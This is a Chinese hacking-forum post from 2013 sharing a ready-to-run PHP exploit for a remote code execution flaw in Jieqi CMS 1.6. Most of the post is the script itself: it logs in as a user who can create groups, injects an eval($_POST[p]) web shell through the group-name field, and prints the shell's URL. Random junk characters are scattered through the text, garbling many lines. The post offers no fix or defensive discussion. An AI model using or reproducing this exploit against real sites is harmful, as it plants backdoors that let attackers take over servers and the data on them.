找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2249|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
2 x, J( y) N5 i# Q/ k; Q; D- K/ u% O5 |9 v& R- a7 M

4 |+ P) O# W9 U$ R) x4 x! [该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。: z% c" s7 S: S: D% o
需要有一个能创建圈子的用户。3 ~) F- C. S3 _  E0 A8 {  |

, c1 q; D1 w( G/ G0 F& P0 e% n<?php8 B4 l. @. R" C0 N. V. P6 m

7 k" I. D5 h0 W5 `0 W, Vprint_r('( F! W# j( T! k- J
+---------------------------------------------------------------------------+
4 }* O; ?* R( aJieqi CMS V1.6 PHP Code Injection Exploit
7 ^4 ^" K4 m  ?1 n. D1 gby flyh4t) b! T' t; I7 L, V6 |
mail: phpsec at hotmail dot com
' J: r8 m4 s( s0 r; Mteam: http://www.wolvez.org
7 {  f. G  x2 P' ]0 `+---------------------------------------------------------------------------+: |8 P6 a( W1 `/ i
'); /**
, C" E: e1 @, X * works regardless of php.ini settings1 E; T. i$ ]: B" G- C
*/ if ($argc < 5) { print_r('
% W0 V1 Q2 U2 P2 K/ b+---------------------------------------------------------------------------+
9 ^( m- F; e6 qUsage: php '.$argv[0].' host path username. U2 m' D, k) N& C
host:      target server (ip/hostname)" X1 M' k7 L# i+ ~) g- M, f
path:      path to jieqicms ; v1 l4 p# y, u* ?" d
uasename:  a username who can create group
$ T  I- i" m- q8 OExample:
3 \- k' S+ R( I0 J) m/ yphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password; ]0 j0 m' z3 [  U5 F
+---------------------------------------------------------------------------+/ j6 @) k) \% z7 r! ?
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
  V, U! X* o7 s9 J0 A9 _Content-Disposition: form-data; name="gname"/ ^+ l: U4 s1 I& @" e  Q; m$ W" O
( C6 E3 i" G7 ?- f& _
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
9 G9 \, A& z0 H$ n6 Q- O-----------------------------23281168279961: M$ E  F7 @* e5 K- X+ Z2 d8 U+ C
Content-Disposition: form-data; name="gcatid"
! u4 K* {$ g* P 9 N$ D9 y$ N2 k5 _  [
15 G3 \3 h' y" \3 n! M
-----------------------------23281168279961
" r! V7 c# A* v; a  j# g6 V0 AContent-Disposition: form-data; name="gaudit"
% q# b3 J& f* B  v( W
1 R. G: w5 j4 `& @4 F! t7 Z& u16 Z( }/ s: V: s- v- K
-----------------------------23281168279961! i4 X' j, F6 I" @- X" }' V! i! k2 V
Content-Disposition: form-data; name="gbrief"9 Q. {! D2 r/ m3 ~8 j
: h. }) k+ j  K/ ]  `* z7 N
1
  f/ x. c/ z% d4 T-----------------------------23281168279961--. r+ e2 x. x% M' ^4 Z% [* P
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
0 p# |& Y5 R3 ~2 H2 p8 `- z( U
; G$ ^/ y% [# |preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表